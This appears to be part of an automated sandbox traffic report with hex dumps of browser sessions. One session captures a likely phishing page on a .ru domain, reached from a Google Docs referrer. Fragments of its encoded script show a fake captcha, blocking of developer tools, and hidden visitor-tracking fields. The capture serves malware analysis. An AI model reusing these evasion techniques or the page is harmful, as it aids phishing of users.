                                                                                        2024-12-18 01:10:13 UTC1390INData Raw: 5f 70 f0 91 27 3a 37 cc cf 2b b0 46 ae 65 5e c5 cc 77 5c 7b 76 f1 a3 b5 7f 7d a8 a9 c9 1b 7c db 55 6b af be 72 5e 99 4f 13 ca 4d 24 ec 0d 49 b7 e7 f0 81 df dd b9 77 5f 7d 64 c3 3f 5e fc e1 35 d9 9a 69 7a 2c dd d0 a5 5b 53 50 5a 5e b2 f9 e1 c3 8f 6f 6e e9 16 5a 7e 55 e9 bb 6e 98 b7 e9 cc 22 5f da f1 a2 3d 3d 7b a4 d0 ac dc 4d 57 ae ba f0 cc 42 bf 61 78 2c c3 d0 85 98 97 ff cd dc bc e7 1e 3f f0 ec b6 9e a6 90 51 31 bb f0 7d ff be f1 a2 c5 39 69 d7 c4 09 f7 c6 da 9b 95 ae a5 c6 7f 0d d3 8a 66 57 5d 7e 4d 24 f2 c7 bd 2f 45 bc 6f b9 74 c5 a5 17 ce 9d 9f 3b ee 3c d5 e8 2f 52 93 91 8e a1 43 3b 9a d7 ce a9 19 4d a0 84 b7 70 d6 0d 5f bb e8 d1 07 76 df 7d 6f 67 ce aa ca 6b 2f 59 b0 71 55 69 ae 35 f5 dd d0 4c bd 77 cb fe dd 6f 9f bd a1 62 64 80 9e e1 cf 5d f7 96 f5
                                                                                        Data Ascii: _p':7+Fe^w\{v}|Ukr^OM$Iw_}d?^5iz,[SPZ^onZ~Un"_=={MWBax,?Q1}9ifW]~M$/Eot;</RC;Mp_v}ogk/YqUi5Lwobd]
                                                                                        2024-12-18 01:10:13 UTC1390INData Raw: c8 d2 84 d4 a6 3a d9 68 38 bc ed b1 97 6f bd b5 b6 4d 19 a6 26 84 90 ba 26 da f6 1f d9 d3 68 97 57 65 07 bd ba 9c a2 dd e8 85 1a 1a 78 fa cf 9b 6f ba bb 3d cb af 6b 52 08 29 0d cb ae dd 72 a4 3e 26 4a 4b b2 02 1e 5d 9b 7c 95 52 c7 1d 0c 3d fb a7 cd 37 ff 4f 8b 27 77 38 1b 92 5e 6f e4 fe fb fb 96 6e 28 9b 11 30 26 1c d2 75 9c 68 b8 ff c1 5f 3d fc 70 4f e1 fa 85 a3 75 ac a4 e5 75 db 5e d8 3b 90 54 52 4a a1 e9 da 40 43 db 9e f6 58 49 65 41 7e d0 1c ff b6 41 65 c7 63 0d db 77 fe f2 b0 5a 5b 95 eb 19 bd ab 89 a1 81 83 3b 1a 0e 76 cb e1 1e 18 96 de ba e7 f0 b6 76 6b 6e 55 76 c0 33 45 df 95 eb da f1 78 eb c1 83 bf be fd a5 a7 f6 47 7d 1e e2 2b e0 75 c5 14 42 00 00 00 00 af 09 c3 63 ec dd d2 7e 70 71 76 59 50 1f 99 ec 26 a5 26 13 07 b6 75 35 1e 92 c6 a4 f7 eb 0d
                                                                                        Data Ascii: :h8oM&&hWexo=kR)r>&JK]|R=7O'w8^on(0&uh_=pOuu^;TRJ@CXIeA~AecwZ[;vvknUv3ExG}+uBc~pqvYP&&u5
                                                                                        2024-12-18 01:10:13 UTC1390INData Raw: d4 0c cb 93 9d e3 0f 7a d3 66 5f 0e 0e ec 7d ba d9 f1 c8 93 35 96 0e c0 6b 8d 00 0b 00 00 00 00 70 da 92 52 8b 0f ee d9 7e b0 76 49 de 92 92 b1 01 55 66 20 58 16 98 6e fa 65 72 d7 c3 2f 3d 56 ef 78 bd d4 62 07 4e 1b fa ca 55 57 9d ea 3e 00 00 00 00 00 70 82 34 4d 86 3b 7b f7 b7 44 8a 67 15 95 64 1f 6f 94 86 1b df fc 9b fb 7e fe 48 9f b4 b4 57 59 72 1f c0 a9 c4 5b 08 01 00 00 00 00 a7 3d 27 69 f7 77 eb 55 1b e7 bc fd a2 d9 f3 aa f3 f2 bc a6 69 0a a5 84 10 42 4a 65 27 92 7d 9d a1 bd 2f ee fb 9f df d5 45 72 3d d9 1e 8d b7 09 02 a7 17 02 2c 00 00 00 00 c0 1b 83 72 92 6e 34 ea c4 62 6e d2 55 ae 1a 5b a1 49 69 5a 9a d7 af fb 3d 3a 03 af 80 d3 11 35 b0 00 00 00 00 00 6f 0c 52 37 f5 a0 a9 07 b3 4f 75 47 00 9c 6c 94 ac 03 00 00 00 00 00 40 46 23 c0 02 00 00 00 00
                                                                                        Data Ascii: zf_}5kpR~vIUf Xner/=VxbNUW>p4M;{Dgdo~HWYr[='iwUiBJe'}/Er=,rn4bnU[IiZ=:5oR7OuGl@F#


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.1649724172.67.214.934436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:25 UTC705OUTGET /ncn6/ HTTP/1.1
                                                                                        Host: dva.dgkifyron.ru
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Referer: https://docs.google.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:26 UTC1254INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:10:26 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Cache-Control: no-cache, private
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f4RmV6%2BY%2Bae7SEo39kTgTeZDzCpOluM6AmmIeLJyrwOe%2BFc7vgK%2FtNbjXCkRpQX%2FoeGcD3G6lUVna58dZ3iSGQ9%2BFCIYv1d%2BFkNV6xYp4o25sKY%2B5%2BiqkE3zBPsyIg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1359&min_rtt=1325&rtt_var=432&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1612&delivery_rate=2726904&cwnd=251&unsent_bytes=0&cid=5092ae9972d8699e&ts=290&x=0"
                                                                                        Set-Cookie: XSRF-TOKEN=eyJpdiI6IlRocEtJRzNGOFVMdGtYTFBVNzNtMHc9PSIsInZhbHVlIjoiR0pOZGxpUFU3NmprVC8rQ0IzbHoyOG11dGlYY2VpL3NWc3pXY1B1SldtczVRRW1NSXRHNlA5WkVEUW95SUFBQ3NuaHpxYnh6QUptRDU2dHJMc0lsT2NVeUdHWlRoeTRscmlzQWpiMGYwd3hKblNCSTlNWHpjRHJGVi9jYWNVWUoiLCJtYWMiOiJkOTRhMzgyNDFlNzc3MTk4MDVkYWRlZjQzNmIxZWZlY2VjNmQ1Mzc2MzBkZDY1NjZiODU5MTFkZTI4MWM4MGJkIiwidGFnIjoiIn0%3D; expires=Wed, 18-Dec-2024 03:10:26 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                        2024-12-18 01:10:26 UTC732INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6a 52 76 54 69 39 59 55 47 4a 61 4e 48 68 75 59 6a 42 4b 62 57 68 4b 4e 46 52 42 64 32 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 52 30 70 70 63 57 5a 49 59 6b 39 54 55 55 31 58 62 6a 59 31 64 47 77 79 55 6b 46 31 52 6e 4a 51 61 31 6c 43 55 48 46 6a 5a 6a 6c 53 51 6b 4e 4f 55 32 55 32 5a 46 4a 51 61 58 68 34 61 6e 4e 54 4e 79 74 78 5a 6c 42 69 63 6c 4a 36 52 6e 68 52 53 57 35 6c 55 56 70 4b 53 31 70 42 5a 32 4a 79 57 6e 63 35 51 6c 70 7a 64 57 64 53 62 33 46 4b 4b 33 45 7a 4d 48 64 4c 61 54 5a 34 57 45 74 72 57 47 6c 6c 63 43 38 35 64 32 52 6a 5a 44 5a 6e 59 6b 6f 32 5a 44 68 75 61 56 4a 53 61 33 70 6f 4d 31 6c 4d 4d 6d 4e 4c 63 47 51
                                                                                        Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IjRvTi9YUGJaNHhuYjBKbWhKNFRBd2c9PSIsInZhbHVlIjoiR0ppcWZIYk9TUU1XbjY1dGwyUkF1RnJQa1lCUHFjZjlSQkNOU2U2ZFJQaXh4anNTNytxZlBiclJ6RnhRSW5lUVpKS1pBZ2JyWnc5QlpzdWdSb3FKK3EzMHdLaTZ4WEtrWGllcC85d2RjZDZnYko2ZDhuaVJSa3poM1lMMmNLcGQ
                                                                                        2024-12-18 01:10:26 UTC1369INData Raw: 37 66 66 61 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 62 75 69 6c 74 20 6f 6e 20 73 75 63 63 65 73 73 2e 20 49 74 26 23 30 33 39 3b 73 20 62 75 69 6c 74 20 6f 6e 20 66 61 69 6c 75 72 65 2e 20 49 74 26 23 30 33 39 3b 73 20 62 75 69 6c 74 20 6f 6e 20 66 72 75 73 74 72 61 74 69 6f 6e 2e 20 53 6f 6d 65 74 69 6d 65 73 20 69 74 26 23 30 33 39 3b 73 20 62 75 69 6c 74 20 6f 6e 20 63 61 74 61 73 74 72 6f 70 68 65 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 54 68 65 20 72 6f 61 64 20 74 6f 20 73 75 63 63 65 73 73 20 61 6e 64 20 74 68 65 20 72 6f 61 64 20 74 6f 20 66 61 69 6c 75 72 65 20 61 72 65 20 61 6c 6d 6f 73 74 20 65 78 61 63 74 6c 79 20 74 68 65 20 73 61 6d 65 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20
                                                                                        Data Ascii: 7ffa... Success is not built on success. It&#039;s built on failure. It&#039;s built on frustration. Sometimes it&#039;s built on catastrophe. -->... The road to success and the road to failure are almost exactly the same. --><script>/* Success
                                                                                        2024-12-18 01:10:26 UTC1369INData Raw: 44 6f 67 4d 44 73 4e 43 69 41 67 49 43 42 79 61 57 64 6f 64 44 6f 67 4d 44 73 4e 43 69 41 67 49 43 42 69 62 33 52 30 62 32 30 36 49 44 41 37 44 51 6f 67 49 43 41 67 65 69 31 70 62 6d 52 6c 65 44 6f 67 4c 54 45 37 44 51 70 39 44 51 6f 75 59 32 39 75 64 47 56 75 64 43 42 37 44 51 6f 67 49 43 41 67 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 77 30 4b 49 43 41 67 49 48 6f 74 61 57 35 6b 5a 58 67 36 49 44 45 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 73 4e 43 69 41 67 49 43 42 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67
                                                                                        Data Ascii: DogMDsNCiAgICByaWdodDogMDsNCiAgICBib3R0b206IDA7DQogICAgei1pbmRleDogLTE7DQp9DQouY29udGVudCB7DQogICAgcG9zaXRpb246IHJlbGF0aXZlOw0KICAgIHotaW5kZXg6IDE7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAg
                                                                                        2024-12-18 01:10:26 UTC1369INData Raw: 68 68 4c 57 4e 6f 5a 57 4e 72 62 57 46 79 61 7a 6f 36 59 57 5a 30 5a 58 49 67 65 77 30 4b 49 43 41 67 49 47 4e 76 62 6e 52 6c 62 6e 51 36 49 43 49 69 4f 77 30 4b 49 43 41 67 49 48 42 76 63 32 6c 30 61 57 39 75 4f 69 42 68 59 6e 4e 76 62 48 56 30 5a 54 73 4e 43 69 41 67 49 43 42 73 5a 57 5a 30 4f 69 41 31 63 48 67 37 44 51 6f 67 49 43 41 67 64 47 39 77 4f 69 41 78 63 48 67 37 44 51 6f 67 49 43 41 67 64 32 6c 6b 64 47 67 36 49 44 5a 77 65 44 73 4e 43 69 41 67 49 43 42 6f 5a 57 6c 6e 61 48 51 36 49 44 45 79 63 48 67 37 44 51 6f 67 49 43 41 67 59 6d 39 79 5a 47 56 79 4f 69 42 7a 62 32 78 70 5a 43 41 6a 4e 47 4e 68 5a 6a 55 77 4f 77 30 4b 49 43 41 67 49 47 4a 76 63 6d 52 6c 63 69 31 33 61 57 52 30 61 44 6f 67 4d 43 41 7a 63 48 67 67 4d 33 42 34 49 44 41 37 44
                                                                                        Data Ascii: hhLWNoZWNrbWFyazo6YWZ0ZXIgew0KICAgIGNvbnRlbnQ6ICIiOw0KICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsNCiAgICBsZWZ0OiA1cHg7DQogICAgdG9wOiAxcHg7DQogICAgd2lkdGg6IDZweDsNCiAgICBoZWlnaHQ6IDEycHg7DQogICAgYm9yZGVyOiBzb2xpZCAjNGNhZjUwOw0KICAgIGJvcmRlci13aWR0aDogMCAzcHggM3B4IDA7D
                                                                                        2024-12-18 01:10:26 UTC1369INData Raw: 67 62 57 46 79 5a 32 6c 75 4c 57 4a 76 64 48 52 76 62 54 6f 67 4d 54 42 77 65 44 73 4e 43 6e 30 4e 43 67 30 4b 4c 6d 4e 68 63 48 52 6a 61 47 45 74 59 32 39 75 64 47 56 75 64 43 42 70 62 6e 42 31 64 43 42 37 44 51 6f 67 49 43 41 67 64 32 6c 6b 64 47 67 36 49 47 4e 68 62 47 4d 6f 4d 54 41 77 4a 53 41 74 49 44 49 77 63 48 67 70 4f 77 30 4b 49 43 41 67 49 48 42 68 5a 47 52 70 62 6d 63 36 49 44 56 77 65 44 73 4e 43 69 41 67 49 43 42 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 44 45 32 63 48 67 37 44 51 6f 67 49 43 41 67 64 47 56 34 64 43 31 68 62 47 6c 6e 62 6a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 66 51 30 4b 44 51 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 5a 57 35 30 49 47 4a 31 64 48 52 76 62 69 42 37 44 51 6f 67 49 43 41 67 63 47 46 6b 5a 47
                                                                                        Data Ascii: gbWFyZ2luLWJvdHRvbTogMTBweDsNCn0NCg0KLmNhcHRjaGEtY29udGVudCBpbnB1dCB7DQogICAgd2lkdGg6IGNhbGMoMTAwJSAtIDIwcHgpOw0KICAgIHBhZGRpbmc6IDVweDsNCiAgICBmb250LXNpemU6IDE2cHg7DQogICAgdGV4dC1hbGlnbjogY2VudGVyOw0KfQ0KDQouY2FwdGNoYS1jb250ZW50IGJ1dHRvbiB7DQogICAgcGFkZG
                                                                                        2024-12-18 01:10:26 UTC1369INData Raw: 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 4d 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35
                                                                                        Data Ascii: RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5
                                                                                        2024-12-18 01:10:26 UTC1369INData Raw: 43 42 78 54 32 5a 45 56 55 35 47 63 57 78 57 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 78 54 32 5a 45 56 55 35 47 63 57 78 57 49 43 30 67 53 30 35 75 53 47 5a 6d 61 57 35 6e 51 69 41 2b 49 47 64 58 55 6d 31 4d 53 32 46 6e 52 48 45 67 4a 69 59 67 49 56 6c 31 59 6b 39 42 56 58 4e 6d 51 32 30 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 68 76 59 30 5a 52 63 31 64 47 65 56 51 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 57 58 56 69 54 30 46 56 63 32 5a 44 62 53 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70
                                                                                        Data Ascii: CBxT2ZEVU5GcWxWID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChxT2ZEVU5GcWxWIC0gS05uSGZmaW5nQiA+IGdXUm1MS2FnRHEgJiYgIVl1Yk9BVXNmQ20pIHsNCiAgICAgICAgICAgIHhvY0ZRc1dGeVQgPSB0cnVlOw0KICAgICAgICAgICAgWXViT0FVc2ZDbSA9IHRydWU7DQogICAgICAgICAgICB3aW5kb3cubG9jYXRp
                                                                                        2024-12-18 01:10:26 UTC1369INData Raw: 64 6c 62 47 6c 75 61 79 49 67 62 6d 46 74 5a 54 30 69 63 47 46 6e 5a 57 78 70 62 6d 73 69 49 48 5a 68 62 48 56 6c 50 53 49 69 50 67 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 70 63 43 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 47 6c 77 49 69 42 32 59 57 78 31 5a 54 30 69 56 57 35 72 62 6d 39 33 62 69 49 2b 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 70 5a 44 30 69 59 6d 78 30 5a 48 4a 6c 5a 69 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 48 4a 6c 5a 69 49 67 64 6d 46 73 64 57 55 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 5a 47 39 6a 63
                                                                                        Data Ascii: dlbGluayIgbmFtZT0icGFnZWxpbmsiIHZhbHVlPSIiPg0KICAgICAgICAgICAgPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGRpcCIgbmFtZT0iYmx0ZGlwIiB2YWx1ZT0iVW5rbm93biI+DQogICAgICAgICAgICA8aW5wdXQgdHlwZT0iaGlkZGVuIiBpZD0iYmx0ZHJlZiIgbmFtZT0iYmx0ZHJlZiIgdmFsdWU9Imh0dHBzOi8vZG9jc
                                                                                        2024-12-18 01:10:26 UTC1369INData Raw: 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 53 41 39 50 54 30 67 49 6b 56 75 64 47 56 79 49 69 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 5a 33 4e 74 56 6c 4e 68 63 31 4a 76 5a 53 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 39 44 51 6f 67 49 43 41 67 66 53 6b 37 44 51 70 39 4b 54 73 4e 43 67 30 4b 59 32 39 75 63 33 51 67 59 32 46 75 64 6d 46 7a 49 44 30 67 5a 47 39 6a 64 57 31 6c 62 6e 51 75 5a 32 56 30 52 57 78 6c 62 57 56 75 64 45 4a 35 53 57 51 6f 49 6d 4e 68 63 48 52 6a 61 47 46 44 59 57 35 32 59 58 4d 69 4b 54 73 4e 43 6d 4e 76 62 6e 4e 30 49 47 4e 30 65 43 41 39 49 47 4e 68 62 6e 5a 68 63 79 35 6e 5a 58
                                                                                        Data Ascii: gZnVuY3Rpb24oZXZlbnQpIHsNCiAgICAgICAgaWYgKGV2ZW50LmtleSA9PT0gIkVudGVyIikgew0KICAgICAgICAgICAgZ3NtVlNhc1JvZSgpOw0KICAgICAgICB9DQogICAgfSk7DQp9KTsNCg0KY29uc3QgY2FudmFzID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImNhcHRjaGFDYW52YXMiKTsNCmNvbnN0IGN0eCA9IGNhbnZhcy5nZX
                                                                                        2024-12-18 01:10:26 UTC1369INData Raw: 4c 6d 5a 70 62 47 78 54 64 48 6c 73 5a 53 41 39 49 47 42 79 5a 32 4a 68 4b 43 52 37 5a 32 56 30 55 6d 46 75 5a 47 39 74 53 57 35 30 4b 44 41 73 49 44 49 31 4e 53 6c 39 4c 43 41 6b 65 32 64 6c 64 46 4a 68 62 6d 52 76 62 55 6c 75 64 43 67 77 4c 43 41 79 4e 54 55 70 66 53 77 67 4a 48 74 6e 5a 58 52 53 59 57 35 6b 62 32 31 4a 62 6e 51 6f 4d 43 77 67 4d 6a 55 31 4b 58 30 73 49 44 41 75 4e 53 6c 67 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 64 48 67 75 5a 6d 6c 73 62 43 67 70 4f 77 30 4b 49 43 41 67 49 48 30 4e 43 6e 30 4e 43 67 30 4b 5a 6e 56 75 59 33 52 70 62 32 34 67 5a 48 4a 68 64 31 4a 68 62 6d 52 76 62 55 56 73 62 47 6c 77 63 32 56 7a 4b 47 4e 30 65 43 77 67 5a 57 78 73 61 58 42 7a 5a 55 4e 76 64 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 5a 6d 39
                                                                                        Data Ascii: LmZpbGxTdHlsZSA9IGByZ2JhKCR7Z2V0UmFuZG9tSW50KDAsIDI1NSl9LCAke2dldFJhbmRvbUludCgwLCAyNTUpfSwgJHtnZXRSYW5kb21JbnQoMCwgMjU1KX0sIDAuNSlgOw0KICAgICAgICBjdHguZmlsbCgpOw0KICAgIH0NCn0NCg0KZnVuY3Rpb24gZHJhd1JhbmRvbUVsbGlwc2VzKGN0eCwgZWxsaXBzZUNvdW50KSB7DQogICAgZm9


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.1649726151.101.2.1374436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:27 UTC622OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                        Host: code.jquery.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://dva.dgkifyron.ru/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:28 UTC612INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        Content-Length: 89501
                                                                                        Server: nginx
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                        ETag: "28feccc0-15d9d"
                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                        Accept-Ranges: bytes
                                                                                        Date: Wed, 18 Dec 2024 01:10:28 GMT
                                                                                        Age: 3005760
                                                                                        X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890069-NYC
                                                                                        X-Cache: HIT, HIT
                                                                                        X-Cache-Hits: 55, 57
                                                                                        X-Timer: S1734484228.239269,VS0,VE0
                                                                                        Vary: Accept-Encoding
                                                                                        2024-12-18 01:10:28 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                        2024-12-18 01:10:28 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                        Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
